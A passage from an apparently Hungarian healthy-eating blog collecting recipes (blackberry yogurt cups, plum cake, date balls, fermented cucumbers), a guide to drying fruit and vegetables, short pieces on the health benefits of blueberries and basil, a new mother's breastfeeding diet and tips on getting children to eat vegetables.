;-) Megjegyzés: Én most egy kicsit lusta voltam, és konzerves babot, illetve gyári paradicsompürét használtam. Ha van időtök, és kedvetek főzzétel elő ti a vörösbabot otthon (szárazbabból), és készítsetek házi paradicsompürét. Sokkal egészségesebb lesz az ételetek! ;-)
Rétegelt szederkrémes pohárdesszert
A múlt hétvégén ismét vidékre utaztunk. Ezúttal a szeder volt tele roskadásig, így szedtem is belőle jócskán, hogy készíthessek belőle valami finomságot. De persze szemezgetni sem utolsó. Édesanyám lekvárt szokott készíteni belőle, ez az első számú kedvencem, amit a meggy+alma lekvár követ a sorban. Ezekből meg tudok enni simán fél üveggel, ha egy kis édességre vágyok. :) (Néha muszáj egy kicsit bűnözni.) Ilyenkor nyáron mindig találni valami finomat a kertben. Szeder, málna, szilva, lassan érnek az almák és a körte, na meg a szőlő is. A szeder tápanyagtartalma nagyon hasonlít a málnáéhoz. Gazdag vitaminokban(A- B1, B6, C-vitamin és folsav) és ásványi anyagokban (kálium, kálcium, foszfor, magnézium, vas). Tele van antioxidáns flavonoidokkal, melyeknek immunerősítő, gyulladáscsökkentő és daganatellenes hatásuk is van. (forrás: www.nemzetisegek.hu) Ez a pohárdesszert rendkívül egyszerű, ugyanakkor mutatós is. Lehet vendégváró, vagy akár reggelire is fogyaszthatjuk. Hozzávalók: 2 pohár vaníliás joghurt (lehet natúr is) 3 marék szeder leturmixolva, 1 marék díszítésnek zabpehely, árpapehely, puffasztott amaránt díszítésnek fajéj, agavé szirup 1. A szedret összeturmixoljuk botmixer segítségével némi fahéjjal és agavé sziruppal ízesítve. 2. Egy pohárba elkezdjük rétegezni a hozzávalókat. 3. Először a szederkrém, majd jöhet némi zabpehely és árpapehely. Ezután a joghurt réteg, majd újra a pelyhek, és a szederkrém. A tetejét joghurttal és egész szederrel koronázzuk, meghintve fahéjjal és amaránttal. 4. Jól lehűtve kínáljuk. Ani
Aszalás 1x1
2015. augusztus 18. Éltető ételek
Az aszalás nem egy újkeletű dolog. Sokan azt gondolják, hogy egy újabb hóbort az egészséges táplálkozás színterén. Nos, elmondható az, hogy már nagyanyáink is aszaltak (pl. almát, szilvát, körtét), még a XX. század elején is több zsáknyi aszalt gyümölcsöt fogyasztottak el, elsősorban a téli estéken. Miért aszaljunk? Az aszalás célja elsősorban a tartósítás , amely során eltávolítjuk az alapanyagokból a nedvességet. Bár azért azt javaslom, hogy törekedjünk a friss gyümölcsök fogyasztására, ugyanis a nedvesség elpárolgása miatt koncentrálódik bennük a fruktóz, amely vércukoringadozást eredményezhet. Valamint candidásoknak is ellenjavallt az édes aszalt gyümölcsök fogyasztása. Ennek ellenére kiváló csemege csak úgy önmagában vagy süteményekbe, kásákba főzve is. Fogyasztásuk télen kifejezetten ajánlott, melegítő hatásuk révén, mivel a szárítással a napenergia (és a meleg) is koncentrálódik benne. Még egy fontos figyelmeztetés! Az aszalványokat fogyasztás előtt áztassuk be kevés tisztított vízbe (főzzük meg valamilyen étellel), vagy mindenképp igyunk utána elegendő folyadékot, hiszen a nedvesség már nincs benne az aszalványokban. Aszalhatunk zöldségeket is, amellyel egészséges chipseket varázsolhatunk az asztalra. Nagyon finom az aszalt répa, cékla, hagyma, de kipróbálásra érdemes a kelkáposzta chips is. Ezek natúr ízeit feldobhatjuk különféle fűszerekkel, amelyeket magtejföllel "rögzítünk" a zöldségekre. Sajnos a bolti aszalványok szinte minden esetben kezelve vannak kén-dioxiddal, cukorszirupba vannak áztatva, és tartósítószerrel vannak telenyomva (a szebb szín, állag érdekében). Arra biztatok mindenkit, hogy az aszalványok vásárlása előtt mindenképp olvassa el a csomagoláson lévő összetevők listáját. Ha csak annyi van rajta, hogy "aszalt áfonya", akkor nyugodtan megvásárolhatjuk. Amennyiben házilag aszalunk, ne várjuk azt, hogy olyan szép színű és állagú legyen, mint a bolti társaik. A sárgabarack barnásabb, és az állaga sem lesz olyan ruganyos, mint a bolti. DE annál finomabb. Érezni benne a barack VALÓDI ízét , zamatát, amely kárpótól az esetleges látványért. Mivel aszaljunk? Az aszalás történhet alacsonyabb és magasabb hőmérsékleten is. Amikor az a célunk, hogy az enzimek sértetlenek maradjanak, akkor mindenképp törekedni kell arra, hogy 45 fok alatt történjen az aszalás. Ezt professzionális aszalógépekkel könnyűszerrel meg tudjuk valósítani. Ha "csak" a tartósítás a cél, akkor lehet sütőben vagy akár kemencében is aszalni. Így is egészséges csemegénk lesz, viszont ezeket már nem nevezhetjük ÉLŐ-nek. De mit is jelent az, hogy élő egy étel? Ha vigyázunk az enzimekre, akkor az aszalvány ugyanolyan jótékony hatással lesz a szervezetünkre, mint a friss társai. Tehát, ha magunknak aszalunk, törekedjünk arra, hogy az enzimek ne sérüljenek. Nap- és szélenergia : ez a legtermészetesebb és legősibb módja az aszalásnak (szárításnak). Mindenképp félárnyékos helyre tegyük az alapanyagokat, és a legjobb az, ha van elegendő légmozgás is. Takarjuk le egy vékony tüll anyaggal, hogy a portól és az apró rovaroktól megóvjuk értékes gyümölcseinket. Sajnos ebben az esetben ki vagyunk téve az időjárás szeszélyeinek, és ezzel a módszerrel akár 1 hétig is eltarthat az aszalás. Arra is érdemes odafigyelni, hogy az aszalódás közben forgassuk a gyümölcsöket, és éjszakára érdemes száraz, fedett helyre vinni, hogy a rovarok és a rágcsálók nehogy kárt tegyenek benne. Padláson (tornácon) történő aszalás : A mai cserép- és palafedésű épületek szuper lehetőséget biztosítanak erre a célra, hiszen adott a meleg, csak a légmozgást kell biztosítani. Itt is oda kell figyelni az esetleges rovarokra és rágcsálókra. Az aszalás kivitelezése megegyezik a napon történő módszerrel. Hagyományos fatüzelésű aszalók (aszalókemence, kemencés aszalóházak): Mint korábban már írtam, a népi gyümölcsaszalás (gombaaszalás!) több évszázados múltra tekint vissza. Az olcsó répacukor megjelenéséig ez napi rutinnak számított. Még ma is fellelhetők ilyen aszalóházak szerte az országban. Házilag készített aszaló"gép" : A neten találhatunk nagyon okos ötleteket arra, hogy hogyan tudunk házilag készíteni aszalót. Csak egy ügyes "barkácsférjre"/párra van szükség, aki elkészíti ezt nekünk. Sörösdobozok újrahasznosításával napkollektort is készíthetünk, így a meleg fokozottan biztosítva van. Sütőben aszalás : Mindenképp légkeveréses sütőre van szükség. Az aszalás során a sütő ajtaját résnyire nyitva kell tartani, hogy a pára távozni tudjon. Amíg magas az alapanyagok nedvességtartalma, addig akár 70-80 fokra is felvehetjük a hőfokot (a kezünkkel érezzük, hogy mennyire meleg a gyümölcs), majd vegyük vissza 40-50 fokra. A hátránya, hogy egyszerre nem tudunk 3-4 tálcánál többet betenni, és az áramfogyasztással is számolni kell.Radiátor, kandalló : télen én is szoktam kis mennyiséget szárítani, pl. hajdinacsírát, ilyenkor egyszerűen a radiátorra helyezem, és reggelre kiszárad. Figyeljünk arra, hogy ne legyenek egymáson az alapanyagok, és időnként mozgassuk meg azokat. Olcsóbb kategóriájú körtálcás, alsó fűtéses aszalógépek : Ezek kerek tálcás aszalógépek, amelyek a meleg levegőt alulról fújják felfelé. Ennek a hátránya az, hogy ha a tálcát telepakoljuk gyümikkel, zöldségekkel vagy éppen gyümölcspéppel, akkor az elzárja az utat a levegő áramlásától. Ezért van az, hogy a felső tálcák kevésbé száradnak, sőt a pára ide csapódik le. Valamint ezen aszalógépekbe nem jellemző, hogy hőfokszabályozó lenne beépítve. Hátsó fűtéses (pl. Excalibur) aszalógép : Ez egy szögletes doboz, amelynek a ventillátora és a fűtőszála a hátsó falba van beépítve. Így minden tálca egyenletesen kapja a meleget, és a levegő áramlása is megoldott. Könnyűszerrel tudunk folyékony gyümölcs- vagy zöldséglapokat is aszalni, és a beépített termosztátnak köszönhetően a hőfokot is be tudjuk állítani. Nekem is ilyen aszalóm van, egyszerre akár 10 kg gyümölcs is aszalható benne. Hogyan aszaljunk? Először is nagyon fontos, hogy érett és egészséges alapanyagokat használjunk fel. Próbáljuk meg egyforma darabokra vágni. Minél kisebb, annál hamarabb lesz kész az aszalvány. Amennyiben gyümölcs- vagy zöldséglapokat akarunk aszalni, ahhoz szükségünk van tapadásmentes lapra. Az így elkészült lapok felhasználása végtelen, kedvünk szerint készíthetünk finomabbnál finomabb ételeket. ... és most jöjjön a lényeg, mit is aszaljunk? Szinte bármilyen gyümölcsöt aszalhatunk: alma, körte, barack, szilva, kiwi, ananász, meggy, cseresznye, eper. Fűszerezhetjük még szárítás előtt, pl. a vanília és a fahéj remekül illenek hozzá. Ezekből készíthetünk nyers lekvárokat, leveseket, de édességek, kekszek, muffinok, természetes édesítők, tortalapok alapanyaga is lehet. Mindenképp próbáljátok ki a zserbó krékert és a zserbó szeletet. De nagy kedvencem a ropogós müzli, amely egy nagy pohár mandulatejjel tökéletes reggeli. Karácsonykor kihagyhatatlan a diós vagy mákos bejgli, amely - a hagyományostól eltérően - gyümölcslapból készül. De, ennek a mákos tésztának is gyümölcslap az alapanyaga. A zöldségek aszalása is igen változatos. Közkedvelt a paradicsom, a padlizsán, a cukkini, a hagyma, a cékla, a répa és a batáta. Ezeket szintén lehet pácolni kedvünk szerint még a szárítás előtt. De zöldséglapot is aszalhatunk, amelyet kedvenc zöldségeinkkel tölthetünk meg. Házi vegetát is aszalással készítek. Ebbe az alapanyagokat kedvünk és ízlésünk szerint variálhatjuk. A gyerekek kedvence a kelkáposzta chips , amely ropogós, fűszeres, hmmm... meg kell kóstolni mindenkinek! És nem utolsósorban egészséges! Különböző zöldségfasírtok, nyers kenyerek, krékerek tehetik változatossá az étkezéseinket. Én az aszalót használom az olajos magok szárítására is. Azt már tudjuk, hogy az enzimgátlók miatt be kell áztatni a magokat. Nos, akkor meg is kell szárítani, hogy utána még hetekig-hónapokig elálljon. Ha az olajos magokat fűszeres szószba keverjük, majd ezt kiszárítjuk, isteni finom ropogtatnivalónk lesz. Fűszernövények szárítása : Elég sok zeller-, petrezselyem- és lestyánlevelem lett, így ezek szárítása is az aszalóban történik. Sőt, még stevia levelet és gyógynövényeket is száríthatunk (természetesen nyáron a napon is). Aszalványok tárolási útmutatója A legfontosabb az, hogy kellően aszaljuk ki az alapanyagokat. Ha ujjunkkal összenyomjuk, ne adjon ki nedvességet, mert akkor ez hamarosan meg fog penészedni. Régen szőtt zsákban tárolták, hűvös, sötét helyen. Sajnos tavaly tapasztaltam azt, hogy nagyon hamar ellepi a molylepke, úgyhogy idén már hűtőben tároltam. Érdemes pár órára lefagyasztani, majd ismét aszaljuk néhány óráig (a páralecsapódás miatt), és ezt már tárolhatjuk akár zacskóban is. Mindenkinek ajánlom, hogy próbálja ki az aszalást, hiszen nemcsak finom, hanem egészséges is. Anikó Felhasznált irodalom: http://okovolgy.hu/keszitsunk-aszalvanyokat-hazilag-3-resz-az-aszalas-tortenete-eljarasok-es-eszkozok/; Lénárt Gitta: Élő aszalványok könyve - Budapest: Bioenergetic K., 2014.
Gyors, cukormentes szilvás sütemény
2015. augusztus 12. Élj harmóniában
Megkezdődött a szilva szezon és a szilva jótékony hatásairól, már írtam bejegyzést (itt olvashatod). Mi nagyon szeretjük a szilvát minden formában - nyersen, csatninak, süteményekbe. Most egy nagyon kedvenc bögrés szilvás süti receptemet készítettem el. A bögrés süteményeket azért szeretem, mert gyorsan elkészíthetőek és még az alapanyagok adagolásához sem kell különösebb előkészület, mérleg, etc.... mindössze egy bögrére van szükségünk. Hozzávalók: - 18-20 db. szilva - 1,5 bögre teljes kiőrlésű tönkölybúzaliszt - 1,5 bögre fehér tönkölybúzaliszt - 1 kk. szódabikarbóna - 1 csg. sütőpor - vanília - fahéj - 1/2 bögre datolyacukor (ez egy természetes édesítő nincs finomítva, tulajdonképpen datolya szárított, őrölt formában. Ha cukorral akarod készíteni barna nádcukrot használhatsz helyette vagy bármilyen más édesítőt) - 10 dkg vaj (vegán változatban kókuszzsír) A szilvákat mosd meg és szedd félbe. Egy tálba keverd össze a többi hozzávalót, majd adj hozzá 2 bögre vizet. A keveréket öntsd egy sütőpapírral kibélelt (vagy kivajazott, lisztezett) tepsibe. Helyezd a félbe szedett szilvákat a tetejére szépen sorba. Majd a tepsit helyezd egy 180 fokra előmelegített sütőbe és süsd meg (kb. 30-40 perc tűpróbával ellenőrizd). Vegyszermentes (bio) alapanyagokat használj!
Az áfonya jótékony hatásai
2015. augusztus 10. Élj harmóniában
Az áfonya nagyon népszerű bogyós gyümölcs szerte a világon. Nálunk Magyarországon nemrégen kezdett elterjedni - korábban mindenki csak a Hupikék törpikékben hallott róla:). Nagyon magas az antioxidáns tartalma, mely számos betegséggel szemben segít a szervezetnek védelmet nyújtani. Segít megelőzni a cukorbetegség kialakulását, csökkenti a rákos megbetegedések kockázatát és véd a szív- és érrendszeri betegségekkel szemben Az áfonya segít a szervezetet fiatalosabban tartani, lassítja az öregedés folyamatát és c sökkenti az öregkori betegségek kialakulását. Rendszeres áfonya fogyasztás e gészségesen tartja a bőr és m egakadályozza a szembetegségek kialakulását. Az áfonya segíti az emésztést is. Legjobb frissen, nyersen és bio áfonyát fogyasztani, mert így tudod a legtöbb tápanyagot kinyerni belőle:)
Görögdinnye falatok
2015. augusztus 9. Gitta nyersétel blogja
Ezek a frissítő, lédús falatkák nagyon ideálisak ebben a kánikulában. Nem is gondolnád, de néhány darabbal jól lehet lakni. Hozzávalók: 1 szép nagy görögdinnye 2-3 evőkanál nyers mandula-túrókrém* kockára vágott uborka, sárgadinnye díszítéshez édeskömény zöldje, friss oregánó mandula-túrókrém 20 dkg mandula 1/2 citrom reszelt héja 1 citrom leve 1 csipet só 1 teáskanál méz A mandulát nem túl finomra aprítjuk, hozzáadjuk a citrom reszelt héját és a levét is. Annyi vizet tegyünk hozzá, hogy az állaga a tehéntúró állagára hasonlítson. Legyenek benne kisebb darabok is, és teljesen krémes rész is. Sóval, mézzel ízesítjük. Fel lehet használni sós és édes ételekhez. Ha gyümölcsös túrókrémet készítünk, akkor több mézet tehetünk bele. A dinnyéhez nem kell több, mint néhány evőkanál ebből a túrókrémből, viszont ennél kevesebbet nem érdemes készíteni. Ami megmarad, azt fel lehet használni másra, édes krékerre kenni, vagy gyümölcsökkel, mézzel, áztatott zabpehellyel összekeverni... annyira finom, hogy biztosan elfogy. A görögdinnyéből egyforma kocka alakú darabokat vágunk, éles késsel mélyedést formázunk bele. A mandula-túrókrémet összekeverjük kockára vágott uborkával, sárgadinnyével, és a mélyedésekbe halmozzuk. Zöld fűszerekkel díszítjük.
Baba – Mama: Újszülött táplálás
Egy hetes a kisfiam és még nincs egy hete, hogy itthon vagyunk. A kórházban töltött napok összefolynak, gyorsan teltek és csak azt vártam, hogy otthon lehessünk saját környezetben. Az idillikus kép gyakran összetörik amint az újszülött és az anyuka hazakerül, mert elkezdődik a bébi táplálása amely tápszerrel vagy anyatejjel, vagy mindkettővel történik. Sok anyuka izgul, hogy minél gyorsabban elinduljon a tejtermelés. Első gyermekem anyatejes volt az első otthon töltött perctől és másfél éves koráig szoptattam, láttam az anyatejes táplálás számtalan pozitív hatását Vikinél az évek alatt, így nem kérdés számomra, hogy kisfiamat is így szeretném táplálni.
Sok anyuka gyorsan feladja, pedig az első anyatej cseppekért “meg kell dolgozni”. Aki már tapasztalta az tudja, hogy ez egy fájdalmas folyamat, de mindenképpen megéri. Én már a kórházban azon “dolgoztam”, hogy elinduljon és szinte vártam, hogy kicsorduljon az első csepp. Köztudott, hogy a babákat ebben a pár napban tápszerrel egészítik ki az újszülött osztályon. Hiába a védőkrém és a szilikonvédő, a kisebesedést most sem úsztam meg, de kárpótolt, hogy minden nap egyre több és több tej képződött és összeszorított fogakkal szopiztunk. Itthon már a második napon csak anyatejet kapott és a fájdalmak is szűntek, tapasztalatból tudom, hogy hamarosan véget érnek. Tehát minden anyukát csak biztatni tudok, hogy tartson ki, mert az anyatej a legtökéletesebb táplálék a kicsik számára és nem mellékesen a legkényelmesebb (főleg a későbbiekben) módja az etetésnek.
Tehát szopizunk az ő ritmusában, de köztudott, hogy a szoptatós anyukák számára nagyon nem mindegy, hogy mit fogyasztanak még vegyes táplálkozás esetén sem. Mi eddig jók vagyunk, nincsenek görcsök, jönnek a böfik és a szelek, viszonylag jól alszik. Táplálkozásomnál, mondhatni a tejserkentő “diétámnál” a következő szempontokat veszem figyelembe, először az általános dolgok:
– nem fogyasztok túl fűszeres, füstölt, fokhagymás ételeket
– kerülöm a “K” kezdőbetűs zöldségeket
– nem iszom szénsavas vizet és üdítőket
– cukrot, tejet, tojást, élesztős ételeket alapból nem fogyasztok, így természetes, hogy most sem.
Könnyű a dolgom, mert nyár van és rengeteg finom, lédús, friss gyümölcs, zöldség áll rendelkezésünkre.
Amiket fogyasztok:
– napi minimum 4 liter víz és tea (édeskömény)
– friss gyümölcsökből különböző turmixok, smoothiek
– gazdag zöldséglevesek és nyers levesek
– cukormentes müzlifélék, leginkább natúr zabpehely, barna kölesliszt, rizstejjel, aszalt gyümölcsökkel és kevés olajos magvakkal.
– főzelékek friss idényzöldségekből, zabpehelylisztes, növényi tejszínes habarással
– zöld turmixok különböző variációkban.
– gazdag saláták, avokádó krémmel, rizsszelettel vagy élesztőmentes, pirított tönkölykenyérrel.
Ami fontos szempont, hogy a turmixok készítésénél a gyümölcsök keverésénél is bőven használom az erjedésgátló fűszereket, hogy ne legyenek emésztési fennakadások, kellemetlenségek. Kedvencem a fahéj és a gyömbér.
Este továbbra sem fogyasztom gyümölcsöket, ilyenkor a zöldségek dominálnak, a nap első és második felében pedig a gyümölcsöket vagy a belőlük készült turmixokat iszom. A nagy meleg miatt előfordul, hogy kimarad az ebéd, ilyenkor este fogyasztom el a leveseket, főzelékeket vagy salátákat. A nagy nyári meleg miatt jelenleg a táplálkozásom 70%-a nyers. Étkezések között pedig a tejszaporító és egyben görcsoldó, bio Neuner’s édeskömény teát.
Nem mellékesen ez a fajta étrend segít kiüríteni a fölösleges vizet a testszövetekből amely a várandóság alatt felgyűlt.
Bazsalikom jótékony hatásai
2015. augusztus 6. Élj harmóniában
A Bazsalikom Indiából származik, de az ókori görögök is a növények királyának tartották a bazsalikomot és az ájurvédában is kiemelt szerepet kap. Mediterrán konyhák nélkülözhetetlen fűszernövényének, gyógynövényként történő hasznosítása is igen sokrétű. Elsődlegesen az olasz konyha használja, levesekbe, tésztaételekhez, pizzákhoz. A bazsalikom jól alkalmazható emésztési problémákra - görcsoldó, szélhajtó, bélfertőtlenítő, emésztést segítő és étvágyjavító hatása is van. Kitűnő segítség megfázásoknál - fertőtleníti és tisztítja a légutakat továbbá antibakteriális és vírusölő hatású . Oldja a köhögést , segíti az asztma, hörghurut gyógyulását és lázcsillapításra is használja az ájurvéda. Nagyon jó immunerősítő gyógynövény. Idegerősítőnek is használják. Nyugtató és élénkítő hatásával, csökkenti a feszültséget, szorongást - jó depresszió ellen . Az ájurvéda szattvikus gyógynövénynek tartja és elősegíti a harmónia, a nyitottság, a szeretet kiteljesedését, kedvezően hat az elmére és a szívre is.
Édesburgonya fűszeres csicseriborsóval
2015. augusztus 5. Éltető ételek
Amennyiben van előre megfőzött csicseriborsó, akkor ez a könnyed vacsora fél óra alatt elkészül. Nagyon ízletes, különleges fűszerezésű, ugyanakkor tápláló is. Hozzávalók (2 adag): - 2 édesburgonya - 1 vöröshagyma - 2 marék brokkolirózsa - 2 evőkanál olívaolaj - 4 gerezd fokhagyma Fűszeres csicseriborsó: - 1 evőkanál kókuszolaj - 15 dkg csicseriborsó - 1 gerezd fokhagyma - 2 marék spenót - himalája só, őrölt római kömény, chili, oreganó, kurkuma Fokhagymás mártás: - 5 dkg kesudió - 1 teáskanál tahini - citrom leve - kapor - himalája só - 1 gerezd fokhagyma - víz Elkészítése: Az éjszakára beáztatott csicseriborsót 1-2 babérlevélben főzzük meg (kb. 1 óra). Csak a végén sózzuk!A batátát hámozzuk meg, majd kockázzuk fel nagyobb darabokra.Egy tepsibe tegyük bele a batátát, a felszeletelt hagymát, és egészben a fokhagymát.Locsoljuk meg egy kevéske olívaolajjal, sózzuk és tegyük be a sütőbe. 200 fokon 10 percig süssük.Adjuk hozzá a brokkolirózsákat, keverjük össze, és süssük ismét úgy 10 percig.Közben készítsük el a fűszeres csicseriborsót. Egy serpenyőbe tegyünk 1 evőkanál kókuszolajat, majd adjuk hozzá a csicseriborsót. Fűszerezzük, és süssük össze. Úgy 5 perc elteltével reszeljünk bele 1 fokhagymát és adjuk hozzá az összetépkedett spenótot is. Süssük össze.A mártáshoz mindent turmixoljunk össze. Ha van idő, akkor a kesudiót 1-2 órára áztassuk be.
Kókuszos datolyagolyó - egészséges energiabomba
2015. augusztus 2. Élj harmóniában
Tegnapi nappal sikerült beszereznem egy fantasztikus, manuális aprítót. Természetesen ma már a reggeli készítésnél használtam bazsalikom és petrezselyem aprításra, de délután a borongós időben gondoltam az egyik kedvenc desszertemet elkészítem. Sokszor kérdezik a jógások mit eszek, ha édességet kívánok... leggyakrabban datolya-kókusz kombinációt:) Ez nagyon jó energiát ad a testnek és nagyon egészséges. A kókuszos datolyagolyót készítheted vendégvárónak, ajándéknak vagy csak úgy a hétköznapokra energiabombának vagy ha éppen megnő az édesség utáni vágyad:) Hozzávalók: - 1 csésze datolya (kb 20 szem) - 8 dkg kókuszreszelék + kókuszreszelék, a külsejére - 1 púpos ek. karob ( kakaót is használhatsz) - fahéj - vanília A datolyát mosd meg, tedd egy kis tálba, majd öntsd le forralt vízzel és áztasd, hogy megpuhuljon. Vedd ki a vízből a datolyákat és tedd a többi hozzávalóval együtt egy aprítóba - ez lehet elektromos turmixgép is. Kezd el összeturmixolni és ha szükséges a datolya áztató vízből annyit tegyél hozzá, hogy formázható, krémes állagú legyen. A masszából formázz golyókat és forgasd bele kókuszreszelékbe. Vegyszermentes (bio) alapanyagokat használj!
Ropogós csoki egészségesen
2015. július 28. Éltető ételek
Ennél egyszerűbb csokit nem tudok elképzelni. Amennyiben van kakaóvajad, abból nagyon finom nyers csokit készíthetsz, ha viszont éppen nincs kéznél, akkor 70%-os keserűcsokit is használhatsz. Hozzávalók: - nyers csoki vagy 70%-os keserűcsoki - mindenmentes kukoricapehely - kerülhet bele puffasztott amaránt vagy quinoa is. - durvára tört dió vagy mogyoró Elkészítése: - Készítsük el a nyers csokit, vagy olvasszuk fel (gőz felett) a bolti változatot.Egy kisméretű szilikonos muffinformába tegyünk egy kevéske csokit, majd tegyük bele a kukoricapelyhet és a magokat. Gyorsan csináljuk, hogy a kukoricapehely ne puhuljon meg. - Erre ismét csorgassunk csokit. - Tegyük be a fagyasztóban 1-2 percre, és kész is van.Hűtve tároljuk. Úgy is elkészíthetjük, hogy az olvasztott csokiba forgatjuk a pelyhet és a magokat, és kanállal kis formákat készítünk.
Így készíts kovászos uborkát!
2015. július 27. Éltető ételek
A kovászos uborka nagy kedvencem, csak úgy magában is szeretem. Sajnos a gyerekeim nem nagyon díjazzák, de annál több marad nekem. Többféleképpen is el lehet készíteni, most leírok pár bevált módszert. A kovászos uborka készítése során tejsavas erjedés történik, ugyanúgy, mint a savanyú káposzta esetében. E fermentáció következtében olyan jótékony baktériumok jönnek létre, melyek támogatják az emésztőrendszerünket, távol tartják a kórokozókat. Tehát ezek nem mások, mint természetes probiotikumok . Ráadásul ezen fermentált ételeket könnyebb megemészteni, mert a baktériumok felbontják a bennük lévő szénhidrátokat. Együnk minden nap fermentált ételt! Alap kovászos uborka (5 literes üveg): - 1,5 kg közepes méretű uborkák - 2-3 szál torma - 2 evőkanál himalája só - 1 evőkanál fekete bors - 1 nagy marék kapor - 1 fej fokhagyma - 1 szelet kovászolt kenyér Elkészítése: A fűszereket a tiszta üvegbe tesszük, majd belerakjuk a megtisztított és bevagdosott uborkákat is. Langyos tisztított vízzel felöntjük, a tetejére egy szelet kovászolt kenyeret rakunk, majd lefedjük egy kistányérral. Napos, meleg helyen 2-3-nap alatt elkészül a kovászos uborka. Hűtőben nagyon sokáig eláll.Sváb kovászos uborka uborka - uborka - 1 közepes méretű, hámozott krumpli - kapor (ez elengedhetetlen a kovászos uborkához) - fűszerek ízlés szerint: fokhagyma, szemes bors, mustármag, babérlevél - 1 liter tisztított vízhez 1 evőkanál himalája só Elkészítése: Először is az uborkákat alaposan tisztítsuk meg, a két végét vágjuk le (főleg, ha keserű).Négy fele vágjuk, de úgy, hogy a két vége egybe maradjon. Tehát beleszúrjuk a kést, és úgy vágjuk be. A tisztított vizet megmelegítjük, és beletesszük a sót. Hagyjuk langyosra hűlni. Közben a felszeletelt krumplit beletesszük az üveg aljára, majd jöhetnek az uborkák. Jó szorosan telepakoljuk az üveget. Felöntjük a langyos vízzel, ízlés szerint teszünk bele fűszereket, és még a tetejére is kerül egy kis krumpli. A lé mindenképp lepje el az ubit, és a krumplit is. Lefedjük, és kitesszük a melegre. Nem a nap számít, hanem a meleg! 2-3 nap alatt elkészül a finom kovászos uborka. Meggyszáras kovászos uborka Ennek az elkészítése megegyezik az előzővel, csak a krumpli helyett 4-6 meggylevél kerül bele a vékony ágacskával együtt az üvegbe. Én azt olvastam, hogy önmagában a kapor is elég lenne az erjesztéshez, mert annak szárán olyan mikroorganizmusok vannak, hogy minden más nélkül is megerjedne az ubi. Nos, így önmagában még nem próbáltam, de ami késik, az nem múlik... Mindenesetre ez a verzió is nagyon finom lett, kellemesen savanykás. Kovászos uborka emócióval Az üvegbe pakolt finomságokra (a meggylevél, kenyér és krumpli helyett) 1 evőkanál emóciót öntöttem. Ugyanúgy lefedve meleg helyen tartottam... és 3 nap múlva el is készült.
Egészséges táplálkozás gyerekekkel
2015. július 27. Zizi kalandjai
Sokan kértétek, hogy adjak tippeket ahhoz, hogyan tudnátok a zöldséget megszerettetni a gyermekeitekkel vagy esetleg kétségbeesett helyzetben – amikor úgy érzitek a gyerek semmit nem hajlandó megenni, amit elé tesztek – mitévők legyetek. Összeírtam néhány dolgot, amelyek nálunk beváltak, de persze ezt ne vegyétek készpénznek, mert minden gyerek más és más, szóval kiszámíthatatlan, hogy kinél mi fog javulást vagy változást hozni. Ez egyszerűen egy hétköznapi anyuka listája olyan dolgokról, amelyek nálunk fontos szerepet játszanak az étkezésben. Sok sikert mindenkinek!
1. Alapok
Az egyik legfontosabb dolog, hogy hogyan indítjuk a hozzátáplálást, majd az azt követő hónapokat. A szezonalitásnak megfelelően kóstoltassunk meg a babával minél többféle zöldséget és gyümölcsöt, hogy szokja az ízeket. Mi zöldséggel kezdtük, répa volt az első szilárd étele Ádinak. Elképzelhető, hogy az édesebb almát, őszibarackot jobban kedvelné egy baba, azonban nálunk nagyon bevált az édeskés répa. Példa: ha a gyermek 4-5 éves korában adunk neki először avokádót (ami az egyik legtáplálóbb “gyümölcs”), akkor ne csodálkozzunk, hogy nem fogja szeretni. Vezessük be az étrendjébe már 1-1,5 éves kora körül (manapság jó minőségű avokádó kapható országosan a nagyobb szupermarketekben), vagyis az első két évben kóstoltassunk vele minél többféle zöldséget és gyümölcsöt. Biztosan lesznek kedvencei és olyanok is, amelyek kevésbé ízlenek neki, de minél többfélét kóstol, annál nagyobb az esély, hogy többet is fog szeretni.
2. Példamutatás
Nálunk szerencsére az egész család egyformát eszik, vagyis apa, anya és gyerek is vegán/vegetáriánus. Azoknál a családoknál, ahol vegyes táplálkozás van (egyesek húsevők, egyesek vegánok/vegetáriánusok), azoknál nehezebb megoldani a példamutatást (de nem lehetetlen!), vagyis, hogy mi szülők is együk ugyanazt, amit a gyermekünknek adunk. Ha mi rántott húst eszünk, de a gyereknek egy tányér zöldséges tésztát adunk, ne csodálkozzunk, ha nem eszi meg. Ráadásul, ha a másolás időszakában van, akkor biztosan ugyanazt akarja enni, mint mi, tehát a zöldséges tészta nem kell majd neki, helyette rántott húst akar enni. Ugyanez vonatkozik bármilyen más ételre is, például a gyereknek humuszt és zöldségeket adunk uzsonnára, mi pedig vajas kenyeret vagy chipset eszünk, akkor biztosan a vajas kenyér vagy a chips fogja érdekelni, nem pedig a humusz zöldségekkel.
3. Kreativitás
A kreativitás vonatkozik a főzésre és a tálalásra is. Ha egyes zöldséget nem eszik meg a gyerekünk, akkor próbáljuk más formában adni neki, esetleg rejtettem. Például nem szereti a cukkinit és a répát felkockázva tésztaszószban, de ha apróra reszeljük és így dinszteljük meg hagymával, fokhagymával, aztán nyakon öntjük egy adag paradicsomszósszal, akkor a zöldségek szinte el fognak veszni a szószban, tehát elképzelhető, hogy szerencsével járunk és ízleni fog neki. Lehet teljesen rejtetten adni, például cukkinit csokis sütibe belekeverni, így aztán lehetetlen észrevennie a gyereknek, hogy cukkinit is eszik. Tehetünk zöld leveleseket smoothie-ba is, ez általában sikert szokott aratni. A tálalásnál is fontos a kreativitás. Én preferálom az osztott tányérokat, így teljesen külön tudom szedni a különböző színű és textúrájú ételeket. Persze a kreatív tálalást el lehet vinni egész extrém irányba is, ha az ember lányának van erre ideje.
4. Piacozzunk és főzzünk közösen!
Lehetőségeinkhez mérten már korán (minél fiatalabb korban) kezdjük el a piacozást, ha nem is iktatjuk be heti programnak, havonta azért egy pár alkalommal menjünk el a gyerekünkkel piacra és hagyjuk a szupermarketet másra. Szokja a gyermek a piac illatát, hangulatát, tanulja a színeket, a formákat, az ízeket (saját tapasztalat: gyereknek mindig adnak kóstolót az árusok/termelők). Mi imádunk piacra járni szombatonként, ez nálunk már családi program, ilyenkor az egész délelőttöt, sőt az ebédidőt is a piacon töltjük, összekötve egy kis játszóterezéssel. Hétköznap is el szoktunk menni piacra, szóval ez nálunk heti többszöri programot jelent. Ha pedig együtt bevásároltunk, akkor hetente minimum egyszer, de inkább több alkalommal vonjuk be a gyereket a főzésbe/sütésbe. Igen, tudom, ilyenkor lassabban haladunk és sokkal maszatosabb lesz a konyha, de mindenképpen megéri a fáradozást. Látja, hogy mennyi “munkát” igényel az ebéd/vacsora elkészítése, ismerkedik a különböző műveletekkel és eszközökkel (vágás, aprítás, 